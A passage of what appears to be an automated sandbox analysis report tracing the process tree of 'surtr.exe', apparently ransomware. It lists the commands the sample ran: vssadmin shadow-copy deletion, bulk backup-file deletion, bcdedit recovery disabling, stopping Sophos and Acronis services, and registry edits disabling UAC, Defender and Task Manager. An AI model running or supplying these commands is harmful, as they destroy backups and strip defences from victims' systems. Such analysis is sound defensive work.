PID 3680 wrote to memory of 3344	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3344	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3640	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 3640	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2772	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2772	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1472	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1472	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2784	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2784	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2600	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2600	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1336	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1336	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1320	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1320	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1616	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1616	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 664	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 664	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 592	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 592	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1176	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1176	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1264	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1264	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2568	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2568	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2392	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2392	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2552	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 2552	3680	surtr.exe	cmd.exe
PID 3680 wrote to memory of 1252	3680	surtr.exe	cmd.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4176
940
5092
2136
1804
4848
4812 attrib.exe
264 attrib.exe

pid	process
4176
940
5092
2136
1804
4848
4812	attrib.exe
264	attrib.exe

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2668

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
3⤵
PID:2332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo off
3⤵
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 437
3⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\system32\chcp.com
chcp 437
4⤵
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
3⤵
PID:1732

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
4⤵
PID:2456

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
3⤵
PID:1520

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
4⤵
PID:3684

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
3⤵
PID:772

C:\Windows\system32\net.exe
net stop "Acronis VSS Provider"
4⤵
PID:344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider"
5⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
3⤵
PID:3060

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
4⤵
PID:576

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
3⤵
PID:3744

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
4⤵
PID:608

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
3⤵
PID:3984

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
4⤵
PID:2716

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
3⤵
PID:3520

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
4⤵
PID:1612

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
3⤵
PID:3920

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
4⤵
PID:3444

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
3⤵
PID:3344

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
4⤵
PID:2060

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
3⤵
PID:3640

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
4⤵
PID:2228

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
3⤵
PID:1472

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
4⤵
PID:1068

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
3⤵
PID:2772

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
4⤵
PID:1964

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
3⤵
PID:2784

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
4⤵
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
3⤵
PID:2600

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
4⤵
PID:1380

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
3⤵
PID:1336

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
4⤵
PID:4016

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
3⤵
PID:1320

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
4⤵
PID:1780

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
3⤵
PID:1616

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
4⤵
PID:1372

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
3⤵
PID:664

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
4⤵
PID:2684

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
3⤵
PID:1176

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
4⤵
PID:1220

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
3⤵
PID:592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
4⤵
PID:1368

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
3⤵
PID:1264

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
4⤵
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
3⤵
PID:2568

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
4⤵
PID:2256

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
3⤵
PID:2392

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
4⤵
PID:4052

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
3⤵
PID:2552

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
4⤵
PID:2080

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
3⤵
PID:1252

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
4⤵
PID:4020

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
5⤵
- Interacts with shadow copies
PID:2224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
3⤵
PID:3028

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
4⤵
PID:1932

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
3⤵
PID:1136

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
4⤵
PID:2180

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
3⤵
PID:4004

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
4⤵
PID:2332

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
3⤵
PID:4176

C:\Windows\system32\net.exe
net stop " Enterprise Client Service"
4⤵
PID:4428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop " Enterprise Client Service"
5⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
3⤵
PID:4756

C:\Windows\system32\net.exe
net stop "Sophos Agent"
4⤵
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent"
5⤵
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
3⤵
PID:4808

C:\Windows\system32\net.exe
net stop "Sophos AutoUpdate Service"
4⤵
PID:4820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
5⤵
PID:4832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
3⤵
PID:4864

C:\Windows\system32\net.exe
net stop "Sophos Clean Service"
4⤵
PID:4876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service"
5⤵
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
3⤵
PID:4912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
3⤵
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
3⤵
PID:4948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
3⤵
PID:4940

C:\Windows\system32\net.exe
net stop "Sophos Device Control Service"
4⤵
PID:5000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service"
5⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
3⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
3⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
3⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
3⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
3⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
3⤵
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
3⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
3⤵
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
3⤵
PID:5112

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
4⤵
PID:4460

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
5⤵
- Modifies boot configuration data using bcdedit
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
3⤵
PID:2084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
3⤵
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
3⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
3⤵
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
3⤵
PID:816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
3⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
3⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
3⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
3⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
3⤵
PID:4772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
3⤵
PID:4804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
3⤵
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
3⤵
PID:4840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
3⤵
PID:4848

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
4⤵
PID:504

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
5⤵
- Modifies boot configuration data using bcdedit
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
3⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
3⤵
PID:4808

C:\Windows\system32\net.exe
net stop "Sophos File Scanner Service"
4⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service"
5⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
PID:388

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4⤵
- UAC bypass
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
3⤵
PID:2020

C:\Windows\system32\net.exe
net stop "Sophos Health Service"
4⤵
PID:4904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service"
5⤵
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:3496

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
4⤵
PID:260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
3⤵
PID:4880

C:\Windows\system32\net.exe
net stop "Sophos MCS Agent"
4⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent"
5⤵
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:276

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:4216

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
4⤵
PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
3⤵
PID:4912

C:\Windows\system32\net.exe
net stop "Sophos MCS Client"
4⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client"
5⤵
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:3904

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
4⤵
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:2984

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
4⤵
PID:4232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MBEndpointAgent"
4⤵
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
3⤵
PID:3324

C:\Windows\system32\net.exe
net stop "Sophos Message Router"
4⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router"
5⤵
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:1336

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
4⤵
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
3⤵
PID:636

C:\Windows\system32\net.exe
net stop "Sophos Safestore Service"
4⤵
PID:2716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service"
5⤵
PID:4164

C:\Windows\system32\cmd.exe
